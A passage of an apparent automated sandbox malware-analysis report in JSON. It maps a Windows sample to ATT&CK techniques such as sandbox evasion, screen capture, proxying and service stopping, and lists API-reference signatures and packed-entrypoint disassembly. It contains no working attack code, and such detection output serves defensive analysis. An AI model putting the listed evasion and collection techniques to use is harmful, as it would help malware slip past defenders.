"informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-345", "type": 2, "relevance": 1, "name": "Contains ability to disable/close registry key (API string)", "description": "Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-315", "type": 2, "relevance": 1, "name": "Contains ability to create/open files (API string)", "description": "Found reference to API \"CreateFileMappingW\" (Indicator: \"CreateFile\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"CreateFileW\" (Indicator: \"CreateFile\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"CreateFileW\" (Indicator: \"CreateFile\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"CreateFileMappingW\" (Indicator: \"CreateFile\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"Software\\Microsoft\\DirectDraw\\Alpha.1\" in Source: 00000000-00003852.00000000.71809.00400000.00000040.mdmp\n \"Software\\Microsoft\\DirectDraw\\Alpha.2\" in Source: 00000000-00003852.00000000.71809.00400000.00000040.mdmp\n \"Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11CF-8B85-00AA005B4383}\" in Source: 00000000-00005808.00000000.72468.00A91000.00000020.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-174", "type": 2, "relevance": 1, "name": "Contains ability to executes commands or batch file", "description": "Found string \"cmd.exe /c \"%s\"\" (Indicator: \"cmd.exe /c\"; Source: \"00000000-00003852.00000000.71809.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67A47DCC.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x418000,lea\tedi, [esi - 0x17000],push\tedi,jmp\t0x4282ba,nop\t,mov\tal, byte ptr [esi],inc\tesi,mov\tbyte ptr [edi], al,inc\tedi,add\tebx, ebx,jne\t0x4282c1,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jb\t0x4282b0,mov\teax, 1,add\tebx, ebx,jne\t0x4282d3,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,adc\teax, eax,add\tebx, ebx,jae\t0x4282c8,jne\t0x4282e4,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,jae\t0x4282c8,xor\tecx, ecx,sub\teax, 3,jb\t0x4282f8,shl\teax, 8,mov\tal, byte ptr [esi],inc\tesi,xor\teax, 0xffffffff,je\t0x42836a,mov\tebp, eax,add\tebx, ebx,jne\t0x428303,mov\tebx, dword ptr [esi],sub\tesi, -4,adc\tebx, ebx,\"\n \"DISMHOST.EXE.67A47DCC.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"SetLastError\" (Indicator: \"SetLastError\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"SetLastError\" (Indicator: \"SetLastError\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-550", "type": 2, "relevance": 1, "name": "Contains ability to find and load resources of specific modules (API string)", "description": "Found reference to API \"FindResourceExW\" (Indicator: \"FindResource\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"LoadResource\" (Indicator: \"LoadResource\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API \"LoadResource\" (Indicator: \"LoadResource\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API \"FindResourceExW\" (Indicator: \"FindResource\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"AddAce\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"VirtualProtect\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"ExitProcess\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"LoadLibraryA\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"NdrOleFree\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"SHGetMalloc\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetDC\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"VariantInit\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"SetSecurityDescriptorOwner\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"RegCloseKey\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"CopySid\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetSecurityDescriptorControl\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"InitializeAcl\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetAclInformation\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"RegQueryValueExW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"SetSecurityDescriptorDacl\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetSidSubAuthority\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetSecurityDescriptorGroup\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"MakeAbsoluteSD\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"RegOpenKeyExW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetSecurityDescriptorOwner\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"IsValidSid\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetSecurityDescriptorDacl\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetSecurityDescriptorSacl\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetLengthSid\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"InitializeSid\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetSidLengthRequired\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"InitializeSecurityDescriptor\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"SetSecurityDescriptorGroup\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"IsValidSecurityDescriptor\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetUserDefaultUILanguage\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetLastError\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"HeapFree\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"EnterCriticalSection\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"OutputDebugStringW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetModuleFileNameW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"SetEvent\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetVersionExW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"FreeLibrary\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"QueryPerformanceCounter\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"HeapDestroy\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"OutputDebugStringA\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetVersionExA\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetFileAttributesW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"lstrlenW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"DeleteCriticalSection\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"WaitForMultipleObjects\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetCommandLineW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"LoadLibraryExW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"SearchPathW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"HeapSize\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetTickCount\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"MapViewOfFile\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"InterlockedCompareExchange\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetLocaleInfoW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"CreateFileMappingW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"RaiseException\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"CreateThread\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetSystemDirectoryW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetSystemDefaultUILanguage\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"UnmapViewOfFile\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"LeaveCriticalSection\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"InterlockedExchange\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"SetUnhandledExceptionFilter\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"FindResourceExW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"CloseHandle\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetSystemTimeAsFileTime\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"HeapReAlloc\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetModuleHandleW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"HeapAlloc\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"LocalFree\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"FormatMessageW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"TerminateProcess\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"LoadLibraryW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"CreateEventW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetModuleHandleExW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"InitializeCriticalSection\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"LoadResource\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"OpenEventW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"CreateFileW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"SetThreadUILanguage\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"InterlockedDecrement\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"Sleep\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetFullPathNameW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetSystemWindowsDirectoryW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"GetProcessHeap\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"SetLastError\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"InterlockedIncrement\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"SysStringLen\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"SysAllocStringLen\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"SysAllocString\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"SysFreeString\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"CommandLineToArgvW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"UnregisterClassA\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"LoadStringW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"TranslateMessage\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"DispatchMessageW\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"RtlAllocateHeap\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"RtlUnwind\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"RtlFreeHeap\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"CoInitializeEx\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"ProgIDFromCLSID\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"CoCreateInstance\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"CoInitializeSecurity\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"CoUninitialize\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"CoTaskMemFree\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"CLSIDFromString\"; File: \"8e7cf6179094262b5088d5c00566541381676c1ff38525be51857bb21ee97b6c\")\n Found reference to API (Indicator: \"FCICreate\"; Source: \"00000000-00003852.00000000.71809.00400000.00000040.mdmp\")\n Found reference to API (Indicator: \"FCIAddFile\"; Source: \"00000000-00003852.00000000.71809.00400000.00000040.mdmp\")\n Found reference to API (Indicator: \"FCIFlushCabinet\"; Source: \"00000000-00003852.00000000.71809.00400000.00000040.mdmp\")\n Found reference to API (Indicator: \"FCIDestroy\"; Source: \"00000000-00003852.00000000.71809.00400000.00000040.mdmp\")\n Found reference to API (Indicator: \"AddAce\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"InitializeAcl\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSecurityDescriptorControl\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"MakeAbsoluteSD\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSecurityDescriptorSacl\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSecurityDescriptorDacl\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSecurityDescriptorGroup\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSecurityDescriptorOwner\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"InitializeSecurityDescriptor\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetLengthSid\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"IsValidSid\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"CopySid\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetAclInformation\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetSecurityDescriptorOwner\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetSecurityDescriptorGroup\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetSecurityDescriptorDacl\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSidSubAuthority\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"InitializeSid\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSidLengthRequired\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"IsValidSecurityDescriptor\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineW\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetThreadUILanguage\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"RaiseException\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"InitializeCriticalSection\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API (Indicator: \"DeleteCriticalSection\"; Source: \"00000000-00005808.00000000.72468.00A91000.00000020.mdmp\")\n Found reference to API 